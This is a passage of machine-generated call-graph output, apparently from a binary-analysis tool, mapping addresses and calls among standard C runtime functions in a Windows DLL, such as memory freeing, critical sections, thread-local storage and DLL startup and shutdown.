8310->8312 8311->8310 8311->8312 8313 6f956a8e __freea 14 API calls 8312->8313 8315 6f95a5e0 8312->8315 8313->8315 8314 6f95a5f2 8317 6f956a8e __freea 14 API calls 8314->8317 8314->8318 8315->8314 8316 6f956a8e __freea 14 API calls 8315->8316 8316->8314 8317->8318 8318->8271 8320 6f95a615 8319->8320 8330 6f95a66d 8319->8330 8321 6f956a8e __freea 14 API calls 8320->8321 8323 6f95a625 8320->8323 8321->8323 8322 6f95a637 8325 6f95a649 8322->8325 8326 6f956a8e __freea 14 API calls 8322->8326 8323->8322 8324 6f956a8e __freea 14 API calls 8323->8324 8324->8322 8327 6f95a65b 8325->8327 8328 6f956a8e __freea 14 API calls 8325->8328 8326->8325 8329 6f956a8e __freea 14 API calls 8327->8329 8327->8330 8328->8327 8329->8330 8330->8290 8332 6f95a38a 8331->8332 8333 6f95a36b 8331->8333 8332->8273 8333->8332 8337 6f95a696 8333->8337 8336 6f956a8e __freea 14 API calls 8336->8332 8338 6f95a384 8337->8338 8339 6f95a6a7 8337->8339 8338->8336 8340 6f95a671 _unexpected 14 API calls 8339->8340 8341 6f95a6af 8340->8341 8342 6f95a671 _unexpected 14 API calls 8341->8342 8343 6f95a6ba 8342->8343 8344 6f95a671 _unexpected 14 API calls 8343->8344 8345 6f95a6c5 8344->8345 8346 6f95a671 _unexpected 14 API calls 8345->8346 8347 6f95a6d0 8346->8347 8348 6f95a671 _unexpected 14 API calls 8347->8348 8349 6f95a6de 8348->8349 8350 6f956a8e __freea 14 API calls 8349->8350 8351 6f95a6e9 8350->8351 8352 6f956a8e __freea 14 API calls 8351->8352 8353 6f95a6f4 8352->8353 8354 6f956a8e __freea 14 API calls 8353->8354 8355 6f95a6ff 8354->8355 8356 6f95a671 _unexpected 14 API calls 8355->8356 8357 6f95a70d 8356->8357 8358 6f95a671 _unexpected 14 API calls 8357->8358 8359 6f95a71b 8358->8359 8360 6f95a671 _unexpected 14 API calls 8359->8360 8361 6f95a72c 8360->8361 8362 6f95a671 _unexpected 14 API calls 8361->8362 8363 6f95a73a 8362->8363 8364 6f95a671 _unexpected 14 API calls 8363->8364 8365 6f95a748 8364->8365 8366 6f956a8e __freea 14 API calls 8365->8366 8367 6f95a753 8366->8367 8368 6f956a8e __freea 14 API calls 8367->8368 8369 6f95a75e 8368->8369 8370 6f956a8e __freea 14 API calls 8369->8370 8371 6f95a769 8370->8371 8372 6f956a8e __freea 14 API calls 8371->8372 8372->8338 8373->8262 8374->8182 8376 6f9576d6 8375->8376 8377 6f9576dd 8375->8377 8376->8164 8383 6f9592bd 8376->8383 8377->8376 8386 6f956567 GetLastError 8377->8386 8587 6f9590c5 8383->8587 8387 6f956583 8386->8387 8388 6f95657d 8386->8388 8390 6f9593f6 _unexpected 6 API calls 8387->8390 8392 6f956587 SetLastError 8387->8392 8389 6f9593b7 _unexpected 6 API calls 8388->8389 8389->8387 8391 6f95659f 8390->8391 8391->8392 8394 6f9578b8 _unexpected 14 API calls 8391->8394 8396 6f956617 8392->8396 8397 6f95661c 8392->8397 8395 6f9565b4 8394->8395 8399 6f9565cd 8395->8399 8400 6f9565bc 8395->8400 8413 6f959f58 8396->8413 8421 6f95609a 8397->8421 8401 6f9593f6 _unexpected 6 API calls 8399->8401 8403 6f9593f6 _unexpected 6 API calls 8400->8403 8404 6f9565d9 8401->8404 8410 6f9565ca 8403->8410 8405 6f9565f4 8404->8405 8406 6f9565dd 8404->8406 8409 6f956369 _unexpected 14 API calls 8405->8409 8407 6f9593f6 _unexpected 6 API calls 8406->8407 8407->8410 8408 6f956a8e __freea 14 API calls 8408->8392 8411 6f9565ff 8409->8411 8410->8408 8412 6f956a8e __freea 14 API calls 8411->8412 8412->8392 8414 6f957714 8413->8414 8415 6f959f6b 8413->8415 8417 6f959fb6 8414->8417 8415->8414 8544 6f95a439 8415->8544 8418 6f959fde 8417->8418 8419 6f959fc9 8417->8419 8418->8376 8419->8418 8566 6f95871f 8419->8566 8432 6f9598d3 8421->8432 8424 6f9560aa 8426 6f9560b4 IsProcessorFeaturePresent 8424->8426 8427 6f9560d3 8424->8427 8428 6f9560c0 8426->8428 8468 6f95535e 8427->8468 8462 6f954d54 8428->8462 8471 6f959801 8432->8471 8435 6f959918 8436 6f959924 CallCatchBlock 8435->8436 8437 6f9566b8 __dosmaperr 14 API calls 8436->8437 8438 6f959974 8436->8438 8441 6f959986 CallCatchBlock 8436->8441 8445 6f959955 CallCatchBlock 8436->8445 8437->8445 8439 6f956a7b __dosmaperr 14 API calls 8438->8439 8443 6f959979 8439->8443 8440 6f95995e 8440->8424 8442 6f9599bc CallCatchBlock 8441->8442 8482 6f956933 EnterCriticalSection 8441->8482 8448 6f959af6 8442->8448 8449 6f9599f9 8442->8449 8459 6f959a27 8442->8459 8446 6f954f50 ___std_exception_copy 39 API calls 8443->8446 8445->8438 8445->8440 8445->8441 8446->8440 8450 6f959b01 8448->8450 8487 6f95697b LeaveCriticalSection 8448->8487 8455 6f956567 _unexpected 39 API calls 8449->8455 8449->8459 8453 6f95535e CallCatchBlock 21 API calls 8450->8453 8454 6f959b09 8453->8454 8457 6f959a1c 8455->8457 8456 6f956567 _unexpected 39 API calls 8460 6f959a7c 8456->8460 8458 6f956567 _unexpected 39 API calls 8457->8458 8458->8459 8483 6f959aa2 8459->8483 8460->8440 8461 6f956567 _unexpected 39 API calls 8460->8461 8461->8440 8463 6f954d70 CallCatchBlock 8462->8463 8464 6f954d9c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8463->8464 8465 6f954e6d CallCatchBlock 8464->8465 8466 6f951cf9 _ValidateLocalCookies 5 API calls 8465->8466 8467 6f954e8b 8466->8467 8467->8427 8489 6f95519b 8468->8489 8472 6f95980d CallCatchBlock 8471->8472 8477 6f956933 EnterCriticalSection 8472->8477 8474 6f95981b 8478 6f95985d 8474->8478 8477->8474 8481 6f95697b LeaveCriticalSection 8478->8481 8480 6f95609f 8480->8424 8480->8435 8481->8480 8482->8442 8484 6f959aa6 8483->8484 8485 6f959a6e 8483->8485 8488 6f95697b LeaveCriticalSection 8484->8488 8485->8440 8485->8456 8485->8460 8487->8450 8488->8485 8490 6f9551c8 8489->8490 8491 6f9551da 8489->8491 8516 6f955263 GetModuleHandleW 8490->8516 8501 6f95504b 8491->8501 8496 6f955217 8500 6f95522c 8502 6f955057 CallCatchBlock 8501->8502 8524 6f956933 EnterCriticalSection 8502->8524 8504 6f955061 8525 6f9550b3 8504->8525 8506 6f95506e 8529 6f95508c 8506->8529 8509 6f955232 8537 6f9552a5 8509->8537 8511 6f95523c 8512 6f955250 8511->8512 8513 6f955240 GetCurrentProcess TerminateProcess 8511->8513 8514 6f9552be CallCatchBlock 3 API calls 8512->8514 8513->8512 8515 6f955258 ExitProcess 8514->8515 8517 6f9551cd 8516->8517 8517->8491 8518 6f9552be GetModuleHandleExW 8517->8518 8519 6f9552fd GetProcAddress 8518->8519 8520 6f95531e 8518->8520 8519->8520 8523 6f955311 8519->8523 8521 6f955324 FreeLibrary 8520->8521 8522 6f9551d9 8520->8522 8521->8522 8522->8491 8523->8520 8524->8504 8527 6f9550bf CallCatchBlock 8525->8527 8526 6f955123 CallCatchBlock 8526->8506 8527->8526 8532 6f955e19 8527->8532 8536 6f95697b LeaveCriticalSection 8529->8536 8531 6f95507a 8531->8496 8531->8509 8533 6f955e25 __EH_prolog3 8532->8533 8534 6f955ce4 __DllMainCRTStartup@12 14 API calls 8533->8534 8535 6f955e4c __DllMainCRTStartup@12 8534->8535 8535->8526 8536->8531 8540 6f9569b7 8537->8540 8539 6f9552aa CallCatchBlock 8539->8511 8542 6f9569c6 CallCatchBlock 8540->8542 8541 6f9569d3 8541->8539 8542->8541 8543 6f95927d CallCatchBlock 5 API calls 8542->8543 8543->8541 8545 6f95a445 CallCatchBlock 8544->8545 8546 6f956567 _unexpected 39 API calls 8545->8546 8547 6f95a44e 8546->8547 8548 6f95a494 8547->8548 8557 6f956933 EnterCriticalSection 8547->8557 8548->8414 8550 6f95a46c 8558 6f95a4ba 8550->8558 8555 6f95609a IsInExceptionSpec 39 API calls 8556 6f95a4b9 8555->8556 8557->8550 8559 6f95a47d 8558->8559 8560 6f95a4c8 _unexpected 8558->8560 8562 6f95a499 8559->8562 8560->8559 8561 6f95a1ed _unexpected 14 API calls 8560->8561 8561->8559 8565 6f95697b LeaveCriticalSection 8562->8565 8564 6f95a490 8564->8548 8564->8555 8565->8564 8567 6f956567 _unexpected 39 API calls 8566->8567 8568 6f958724 8567->8568 8571 6f958637 8568->8571 8572 6f958643 CallCatchBlock 8571->8572 8579 6f95865d 8572->8579 8582 6f956933 EnterCriticalSection 8572->8582 8574 6f958699 8583 6f9586b6 8574->8583 8576 6f95609a IsInExceptionSpec 39 API calls 8580 6f9586d6 8576->8580 8577 6f958664 8577->8418 8578 6f95866d 8578->8574 8581 6f956a8e __freea 14 API calls 8578->8581 8579->8576 8579->8577 8581->8574 8582->8578 8586 6f95697b LeaveCriticalSection 8583->8586 8585 6f9586bd 8585->8579 8586->8585 8588 6f9591f8 _unexpected 5 API calls 8587->8588 8589 6f9590db 8588->8589 8589->8164 8591 6f9575fe 8590->8591 8592 6f957618 8590->8592 8608 6f957780 8591->8608 8594 6f95761f 8592->8594 8595 6f95763e 8592->8595 8597 6f957608 8594->8597 8612 6f95779a 8594->8612 8617 6f958ad1 8595->8617 8597->8026 8597->8027 8598 6f95764d 8600 6f957654 GetLastError 8598->8600 8602 6f95767a 8598->8602 8604 6f95779a 15 API calls 8598->8604 8601 6f956a21 __dosmaperr 14 API calls 8600->8601 8603 6f957660 8601->8603 8602->8597 8605 6f958ad1 ___scrt_uninitialize_crt MultiByteToWideChar 8602->8605 8606 6f956a7b __dosmaperr 14 API calls 8603->8606 8604->8602 8607 6f957691 8605->8607 8606->8597 8607->8597 8607->8600 8609 6f957793 8608->8609 8610 6f95778b 8608->8610 8609->8597 8611 6f956a8e __freea 14 API calls 8610->8611 8611->8609 8613 6f957780 14 API calls 8612->8613 8614 6f9577a8 8613->8614 8620 6f9577d9 8614->8620 8644 6f958a39 8617->8644 8623 6f95786a 8620->8623 8624 6f9578a8 8623->8624 8628 6f957878 _unexpected 8623->8628 8626 6f956a7b __dosmaperr 14 API calls 8624->8626 8625 6f957893 HeapAlloc 8627 6f9577b9 8625->8627 8625->8628 8626->8627 8627->8597 8628->8624 8628->8625 8630 6f9554c6 8628->8630 8633 6f9554f2 8630->8633 8634 6f9554fe CallCatchBlock 8633->8634 8639 6f956933 EnterCriticalSection 8634->8639 8636 6f955509 CallCatchBlock 8640 6f955540 8636->8640 8639->8636 8643 6f95697b LeaveCriticalSection 8640->8643 8642 6f9554d1 8642->8628 8643->8642 8645 6f958a4a MultiByteToWideChar 8644->8645 8645->8598 8670 6f956c5b 8646->8670 8650 6f957741 39 API calls 8649->8650 8651 6f95ae5d 8650->8651 8652 6f9576a2 17 API calls 8651->8652 8654 6f95ae6a 8652->8654 8653 6f95aed1 8655 6f95aedd 8653->8655 8657 6f956a8e __freea 14 API calls 8653->8657 8654->8653 8656 6f957741 39 API calls 8654->8656 8658 6f95aeec 8655->8658 8661 6f956a8e __freea 14 API calls 8655->8661 8659 6f95ae76 8656->8659 8657->8655 8660 6f956fbd 8658->8660 8664 6f956a8e __freea 14 API calls 8658->8664 8662 6f9576a2 17 API calls 8659->8662 8660->8059 8660->8060 8660->8061 8661->8658 8663 6f95ae83 8662->8663 8663->8653 8665 6f95aead CreateProcessW 8663->8665 8666 6f957741 39 API calls 8663->8666 8664->8660 8665->8653 8667 6f95ae94 8666->8667 8668 6f9576a2 17 API calls 8667->8668 8669 6f95aea1 8668->8669 8669->8653 8669->8665 8671 6f956c67 CallCatchBlock 8670->8671 8678 6f956933 EnterCriticalSection 8671->8678 8673 6f956c75 8679 6f9570b7 8673->8679 8678->8673 8680 6f9570e0 8679->8680 8681 6f95710c 8680->8681 8682 6f95711e 8680->8682 8683 6f956a7b __dosmaperr 14 API calls 8681->8683 8684 6f9578b8 _unexpected 14 API calls 8682->8684 8689 6f956c82 8683->8689 8685 6f957132 8684->8685 8686 6f956a7b __dosmaperr 14 API calls 8685->8686 8687 6f957140 8685->8687 8686->8687 8688 6f956a8e __freea 14 API calls 8687->8688 8688->8689 8690 6f956caa 8689->8690 8693 6f95697b LeaveCriticalSection 8690->8693 8692 6f956c93 8692->8047 8692->8048 8693->8692 8695 6f954eae _Allocate 8694->8695 8700 6f954ed3 8695->8700 8701 6f954ee3 8700->8701 8702 6f954eea 8700->8702 8715 6f954cf1 GetLastError 8701->8715 8706 6f954ec6 8702->8706 8719 6f954cc8 8702->8719 8705 6f954f1f 8705->8706 8707 6f954f7d _Allocate 11 API calls 8705->8707 8709 6f954c8c 8706->8709 8708 6f954f4f 8707->8708 8710 6f954c98 8709->8710 8711 6f954caf 8710->8711 8744 6f954d37 8710->8744 8713 6f954cc2 8711->8713 8714 6f954d37 _Allocate 39 API calls 8711->8714 8713->7975 8714->8713 8716 6f954d0a 8715->8716 8722 6f956769 8716->8722 8720 6f954cd3 GetLastError SetLastError 8719->8720 8721 6f954cec 8719->8721 8720->8705 8721->8705 8723 6f956782 8722->8723 8724 6f95677c 8722->8724 8725 6f9593f6 _unexpected 6 API calls 8723->8725 8730 6f954d22 SetLastError 8723->8730 8726 6f9593b7 _unexpected 6 API calls 8724->8726 8727 6f95679c 8725->8727 8726->8723 8728 6f9578b8 _unexpected 14 API calls 8727->8728 8727->8730 8729 6f9567ac 8728->8729 8731 6f9567b4 8729->8731 8732 6f9567c9 8729->8732 8730->8702 8733 6f9593f6 _unexpected 6 API calls 8731->8733 8734 6f9593f6 _unexpected 6 API calls 8732->8734 8735 6f9567c0 8733->8735 8736 6f9567d5 8734->8736 8740 6f956a8e __freea 14 API calls 8735->8740 8737 6f9567d9 8736->8737 8738 6f9567e8 8736->8738 8741 6f9593f6 _unexpected 6 API calls 8737->8741 8739 6f956369 _unexpected 14 API calls 8738->8739 8742 6f9567f3 8739->8742 8740->8730 8741->8735 8743 6f956a8e __freea 14 API calls 8742->8743 8743->8730 8745 6f954d41 8744->8745 8746 6f954d4a 8744->8746 8747 6f954cf1 _Allocate 16 API calls 8745->8747 8746->8711 8748 6f954d46 8747->8748 8748->8746 8749 6f95609a IsInExceptionSpec 39 API calls 8748->8749 8750 6f954d53 8749->8750 8984 6f951d2a 8985 6f951d35 8984->8985 8986 6f951d68 8984->8986 8988 6f951d5a 8985->8988 8989 6f951d3a 8985->8989 9023 6f951e84 8986->9023 8996 6f951d7d 8988->8996 8991 6f951d50 8989->8991 8992 6f951d3f 8989->8992 9015 6f95237c 8991->9015 8995 6f951d44 8992->8995 9010 6f95239b 8992->9010 8997 6f951d89 CallCatchBlock 8996->8997 9046 6f95240c 8997->9046 8999 6f951d90 __DllMainCRTStartup@12 9000 6f951db7 8999->9000 9001 6f951e7c 8999->9001 9008 6f951df3 ___scrt_is_nonwritable_in_current_image CallCatchBlock 8999->9008 9057 6f95236e 9000->9057 9065 6f9525ab IsProcessorFeaturePresent 9001->9065 9004 6f951e83 9005 6f951dc6 __RTC_Initialize 9005->9008 9060 6f95228c InitializeSListHead 9005->9060 9007 6f951dd4 9007->9008 9061 6f952343 9007->9061 9008->8995 9212 6f955fba 9010->9212 9301 6f9531ec 9015->9301 9018 6f952385 9018->8995 9021 6f952398 9021->8995 9022 6f9531f7 21 API calls 9022->9018 9025 6f951e90 CallCatchBlock __DllMainCRTStartup@12 9023->9025 9024 6f951e99 9024->8995 9025->9024 9026 6f951ec1 9025->9026 9027 6f951f2c 9025->9027 9321 6f9523dc 9026->9321 9028 6f9525ab __DllMainCRTStartup@12 4 API calls 9027->9028 9032 6f951f33 CallCatchBlock 9028->9032 9030 6f951ec6 9330 6f952298 9030->9330 9033 6f951f69 dllmain_raw 9032->9033 9042 6f951f64 __DllMainCRTStartup@12 9032->9042 9043 6f951f4f 9032->9043 9035 6f951f83 dllmain_crt_dispatch 9033->9035 9033->9043 9034 6f951ecb __RTC_Initialize __DllMainCRTStartup@12 9333 6f95257d 9034->9333 9035->9042 9035->9043 9039 6f951fd5 9040 6f951fde dllmain_crt_dispatch 9039->9040 9039->9043 9041 6f951ff1 dllmain_raw 9040->9041 9040->9043 9041->9043 9042->9039 9044 6f951e84 __DllMainCRTStartup@12 81 API calls 9042->9044 9043->8995 9045 6f951fca dllmain_raw 9044->9045 9045->9039 9047 6f952415 9046->9047 9069 6f952778 IsProcessorFeaturePresent 9047->9069 9051 6f952426 9056 6f95242a 9051->9056 9079 6f955f9d 9051->9079 9054 6f952441 9054->8999 9056->8999 9206 6f952445 9057->9206 9059 6f952375 9059->9005 9060->9007 9062 6f952348 ___scrt_release_startup_lock 9061->9062 9063 6f952778 IsProcessorFeaturePresent 9062->9063 9064 6f952351 9062->9064 9063->9064 9064->9008 9066 6f9525c1 CallCatchBlock 9065->9066 9067 6f95266c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9066->9067 9068 6f9526b7 CallCatchBlock 9067->9068 9068->9004 9070 6f952421 9069->9070 9071 6f9531cd 9070->9071 9088 6f953807 9071->9088 9074 6f9531d6 9074->9051 9076 6f9531de 9077 6f9531e9 9076->9077 9102 6f953843 9076->9102 9077->9051 9144 6f959768 9079->9144 9082 6f953202 9083 6f953215 9082->9083 9084 6f95320b 9082->9084 9083->9056 9085 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9084->9085 9086 6f953210 9085->9086 9087 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9086->9087 9087->9083 9089 6f953810 9088->9089 9091 6f953839 9089->9091 9092 6f9531d2 9089->9092 9106 6f953e3b 9089->9106 9093 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9091->9093 9092->9074 9094 6f9537b9 9092->9094 9093->9092 9125 6f953d4c 9094->9125 9097 6f9537ce 9097->9076 9100 6f9537e9 9100->9076 9103 6f95384e 9102->9103 9105 6f95386d 9102->9105 9104 6f953858 DeleteCriticalSection 9103->9104 9104->9104 9104->9105 9105->9074 9111 6f953d03 9106->9111 9109 6f953e73 InitializeCriticalSectionAndSpinCount 9110 6f953e5e 9109->9110 9110->9089 9112 6f953d1b 9111->9112 9115 6f953d3e 9111->9115 9112->9115 9117 6f953c69 9112->9117 9115->9109 9115->9110 9116 6f953d30 GetProcAddress 9116->9115 9122 6f953c75 ___vcrt_InitializeCriticalSectionEx 9117->9122 9118 6f953c8b LoadLibraryExW 9120 6f953cf0 9118->9120 9121 6f953ca9 GetLastError 9118->9121 9119 6f953ce9 9119->9115 9119->9116 9120->9119 9123 6f953cf8 FreeLibrary 9120->9123 9121->9122 9122->9118 9122->9119 9124 6f953ccb LoadLibraryExW 9122->9124 9123->9119 9124->9120 9124->9122 9126 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9125->9126 9127 6f953d66 9126->9127 9128 6f953d7f TlsAlloc 9127->9128 9129 6f9537c3 9127->9129 9129->9097 9130 6f953dfd 9129->9130 9131 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9130->9131 9132 6f953e17 9131->9132 9133 6f953e32 TlsSetValue 9132->9133 9134 6f9537dc 9132->9134 9133->9134 9134->9100 9135 6f9537ec 9134->9135 9136 6f9537fc 9135->9136 9137 6f9537f6 9135->9137 9136->9097 9139 6f953d87 9137->9139 9140 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9139->9140 9141 6f953da1 9140->9141 9142 6f953dad 9141->9142 9143 6f953db9 TlsFree 9141->9143 9142->9136 9143->9142 9145 6f959778 9144->9145 9146 6f952433 9144->9146 9145->9146 9148 6f9596dc 9145->9148 9146->9054 9146->9082 9149 6f9596e8 CallCatchBlock 9148->9149 9160 6f956933 EnterCriticalSection 9149->9160 9151 6f9596ef 9161 6f95baf8 9151->9161 9159 6f95970d 9185 6f959733 9159->9185 9160->9151 9162 6f95bb04 CallCatchBlock 9161->9162 9163 6f95bb0d 9162->9163 9164 6f95bb2e 9162->9164 9166 6f956a7b __dosmaperr 14 API calls 9163->9166 9188 6f956933 EnterCriticalSection 9164->9188 9167 6f95bb12 9166->9167 9168 6f954f50 ___std_exception_copy 39 API calls 9167->9168 9169 6f9596fe 9168->9169 9169->9159 9174 6f959576 GetStartupInfoW 9169->9174 9170 6f95bb66 9196 6f95bb8d 9170->9196 9171 6f95bb3a 9171->9170 9189 6f95ba48 9171->9189 9175 6f959593 9174->9175 9177 6f959627 9174->9177 9176 6f95baf8 40 API calls 9175->9176 9175->9177 9178 6f9595bb 9176->9178 9180 6f95962c 9177->9180 9178->9177 9179 6f9595eb GetFileType 9178->9179 9179->9178 9181 6f959633 9180->9181 9182 6f959676 GetStdHandle 9181->9182 9183 6f9596d8 9181->9183 9184 6f959689 GetFileType 9181->9184 9182->9181 9183->9159 9184->9181 9205 6f95697b LeaveCriticalSection 9185->9205 9187 6f95971e 9187->9145 9188->9171 9190 6f9578b8 _unexpected 14 API calls 9189->9190 9193 6f95ba5a 9190->9193 9191 6f95ba67 9192 6f956a8e __freea 14 API calls 9191->9192 9194 6f95babc 9192->9194 9193->9191 9199 6f959438 9193->9199 9194->9171 9204 6f95697b LeaveCriticalSection 9196->9204 9198 6f95bb94 9198->9169 9200 6f9591f8 _unexpected 5 API calls 9199->9200 9201 6f959454 9200->9201 9202 6f959472 InitializeCriticalSectionAndSpinCount 9201->9202 9203 6f95945d 9201->9203 9202->9203 9203->9193 9204->9198 9205->9187 9207 6f952455 9206->9207 9208 6f952451 9206->9208 9209 6f9525ab __DllMainCRTStartup@12 4 API calls 9207->9209 9211 6f952462 ___scrt_release_startup_lock 9207->9211 9208->9059 9210 6f9524cb 9209->9210 9211->9059 9218 6f95653b 9212->9218 9215 6f9531f7 9284 6f9536e3 9215->9284 9219 6f956545 9218->9219 9220 6f9523a0 9218->9220 9221 6f9593b7 _unexpected 6 API calls 9219->9221 9220->9215 9222 6f95654c 9221->9222 9222->9220 9223 6f9593f6 _unexpected 6 API calls 9222->9223 9224 6f95655f 9223->9224 9226 6f956402 9224->9226 9227 6f95640d 9226->9227 9228 6f95641d 9226->9228 9232 6f956423 9227->9232 9228->9220 9231 6f956a8e __freea 14 API calls 9231->9228 9233 6f95643e 9232->9233 9234 6f956438 9232->9234 9236 6f956a8e __freea 14 API calls 9233->9236 9235 6f956a8e __freea 14 API calls 9234->9235 9235->9233 9237 6f95644a 9236->9237 9238 6f956a8e __freea 14 API calls 9237->9238 9239 6f956455 9238->9239 9240 6f956a8e __freea 14 API calls 9239->9240 9241 6f956460 9240->9241 9242 6f956a8e __freea 14 API calls 9241->9242 9243 6f95646b 9242->9243 9244 6f956a8e __freea 14 API calls 9243->9244 9245 6f956476 9244->9245 9246 6f956a8e __freea 14 API calls 9245->9246 9247 6f956481 9246->9247 9248 6f956a8e __freea 14 API calls 9247->9248 9249 6f95648c 9248->9249 9250 6f956a8e __freea 14 API calls 9249->9250 9251 6f956497 9250->9251 9252 6f956a8e __freea 14 API calls 9251->9252 9253 6f9564a5 9252->9253 9258 6f95624f 9253->9258 9259 6f95625b CallCatchBlock 9258->9259 9274 6f956933 EnterCriticalSection 9259->9274 9261 6f95628f 9275 6f9562ae 9261->9275 9263 6f956265 9263->9261 9265 6f956a8e __freea 14 API calls 9263->9265 9265->9261 9266 6f9562ba 9267 6f9562c6 CallCatchBlock 9266->9267 9279 6f956933 EnterCriticalSection 9267->9279 9269 6f9562d0 9270 6f9564f0 _unexpected 14 API calls 9269->9270 9271 6f9562e3 9270->9271 9280 6f956303 9271->9280 9274->9263 9278 6f95697b LeaveCriticalSection 9275->9278 9277 6f95629c 9277->9266 9278->9277 9279->9269 9283 6f95697b LeaveCriticalSection 9280->9283 9282 6f9562f1 9282->9231 9283->9282 9285 6f9536f0 9284->9285 9291 6f9523a5 9284->9291 9288 6f9536fe 9285->9288 9292 6f953dc2 9285->9292 9287 6f953dfd ___vcrt_FlsSetValue 6 API calls 9289 6f95370e 9287->9289 9288->9287 9297 6f9536c7 9289->9297 9291->8995 9293 6f953d03 ___vcrt_InitializeCriticalSectionEx 5 API calls 9292->9293 9294 6f953ddc 9293->9294 9295 6f953df4 TlsGetValue 9294->9295 9296 6f953de8 9294->9296 9295->9296 9296->9288 9298 6f9536d1 9297->9298 9300 6f9536de 9297->9300 9299 6f9555ad ___std_exception_destroy 14 API calls 9298->9299 9298->9300 9299->9300 9300->9291 9307 6f953727 9301->9307 9303 6f952381 9303->9018 9304 6f955faf 9303->9304 9305 6f9566b8 __dosmaperr 14 API calls 9304->9305 9306 6f95238d 9305->9306 9306->9021 9306->9022 9308 6f953730 9307->9308 9309 6f953733 GetLastError 9307->9309 9308->9303 9310 6f953dc2 ___vcrt_FlsGetValue 6 API calls 9309->9310 9311 6f953748 9310->9311 9312 6f953767 9311->9312 9313 6f9537ad SetLastError 9311->9313 9314 6f953dfd ___vcrt_FlsSetValue 6 API calls 9311->9314 9312->9313 9313->9303 9315 6f953761 CallCatchBlock 9314->9315 9315->9312 9316 6f953789 9315->9316 9317 6f953dfd ___vcrt_FlsSetValue 6 API calls 9315->9317 9318 6f953dfd ___vcrt_FlsSetValue 6 API calls 9316->9318 9319 6f95379d 9316->9319 9317->9316 9318->9319 9320 6f9555ad ___std_exception_destroy 14 API calls 9319->9320 9320->9312 9322 6f9523e1 ___scrt_release_startup_lock 9321->9322 9323 6f9523e5 9322->9323 9326 6f9523f1 __DllMainCRTStartup@12 9322->9326 9324 6f955e19 __DllMainCRTStartup@12 14 API calls 9323->9324 9325 6f9523ef 9324->9325 9325->9030 9327 6f9523fe 9326->9327 9328 6f95519b CallCatchBlock 21 API calls 9326->9328 9327->9030 9329 6f95535a 9328->9329 9329->9030 9342 6f9531aa InterlockedFlushSList 9330->9342 9334 6f952589 9333->9334 9338 6f951eea 9334->9338 9346 6f955fc2 9334->9346 9336 6f952597 9337 6f953202 ___scrt_uninitialize_crt 7 API calls 9336->9337 9337->9338 9339 6f951f26 9338->9339 9444 6f9523ff 9339->9444 9343 6f9522a2 9342->9343 9344 6f9531ba 9342->9344 9343->9034 9344->9343 9345 6f9555ad ___std_exception_destroy 14 API calls 9344->9345 9345->9344 9347 6f955fcd 9346->9347 9348 6f955fdf ___scrt_uninitialize_crt 9346->9348 9349 6f955fdb 9347->9349 9351 6f959e13 9347->9351 9348->9336 9349->9336 9354 6f959ca4 9351->9354 9357 6f959bf8 9354->9357 9358 6f959c04 CallCatchBlock 9357->9358 9365 6f956933 EnterCriticalSection 9358->9365 9360 6f959c7a 9374 6f959c98 9360->9374 9361 6f959c0e ___scrt_uninitialize_crt 9361->9360 9366 6f959b6c 9361->9366 9365->9361 9367 6f959b78 CallCatchBlock 9366->9367 9377 6f959f30 EnterCriticalSection 9367->9377 9369 6f959b82 ___scrt_uninitialize_crt 9370 6f959bbb 9369->9370 9378 6f959dae 9369->9378 9391 6f959bec 9370->9391 9443 6f95697b LeaveCriticalSection 9374->9443 9376 6f959c86 9376->9349 9377->9369 9379 6f959dc3 _Allocate 9378->9379 9380 6f959dd5 9379->9380 9381 6f959dca 9379->9381 9394 6f959d45 9380->9394 9383 6f959ca4 ___scrt_uninitialize_crt 68 API calls 9381->9383 9384 6f959dd0 9383->9384 9386 6f954c8c _Allocate 39 API calls 9384->9386 9388 6f959e0d 9386->9388 9388->9370 9389 6f959df6 9407 6f95bd79 9389->9407 9442 6f959f44 LeaveCriticalSection 9391->9442 9393 6f959bda 9393->9361 9395 6f959d5e 9394->9395 9399 6f959d85 9394->9399 9396 6f95a149 ___scrt_uninitialize_crt 39 API calls 9395->9396 9395->9399 9397 6f959d7a 9396->9397 9418 6f95c598 9397->9418 9399->9384 9400 6f95a149 9399->9400 9401 6f95a155 9400->9401 9402 6f95a16a 9400->9402 9403 6f956a7b __dosmaperr 14 API calls 9401->9403 9402->9389 9404 6f95a15a 9403->9404 9405 6f954f50 ___std_exception_copy 39 API calls 9404->9405 9406 6f95a165 9405->9406 9406->9389 9408 6f95bd8a 9407->9408 9411 6f95bd97 9407->9411 9409 6f956a7b __dosmaperr 14 API calls 9408->9409 9417 6f95bd8f 9409->9417 9410 6f95bde0 9412 6f956a7b __dosmaperr 14 API calls 9410->9412 9411->9410 9413 6f95bdbe 9411->9413 9414 6f95bde5 9412->9414 9429 6f95bcd7 9413->9429 9416 6f954f50 ___std_exception_copy 39 API calls 9414->9416 9416->9417 9417->9384 9420 6f95c5a4 CallCatchBlock 9418->9420 9419 6f95c5ac 9419->9399 9420->9419 9421 6f95c5e5 9420->9421 9423 6f95c62b 9420->9423 9422 6f954ed3 _Allocate 29 API calls 9421->9422 9422->9419 9424 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9423->9424 9425 6f95c631 9424->9425 9426 6f95c64f 9425->9426 9427 6f95c6a9 ___scrt_uninitialize_crt 62 API calls 9425->9427 9428 6f95c6a1 ___scrt_uninitialize_crt LeaveCriticalSection 9426->9428 9427->9426 9428->9419 9430 6f95bce3 CallCatchBlock 9429->9430 9431 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9430->9431 9432 6f95bcf2 9431->9432 9433 6f95bd37 9432->9433 9435 6f95bc6d ___scrt_uninitialize_crt 39 API calls 9432->9435 9434 6f956a7b __dosmaperr 14 API calls 9433->9434 9436 6f95bd3e 9434->9436 9437 6f95bd1e FlushFileBuffers 9435->9437 9439 6f95bd6d ___scrt_uninitialize_crt LeaveCriticalSection 9436->9439 9437->9436 9438 6f95bd2a GetLastError 9437->9438 9440 6f956a68 __dosmaperr 14 API calls 9438->9440 9441 6f95bd56 9439->9441 9440->9433 9441->9417 9442->9393 9443->9376 9449 6f955ff2 9444->9449 9447 6f9537ec 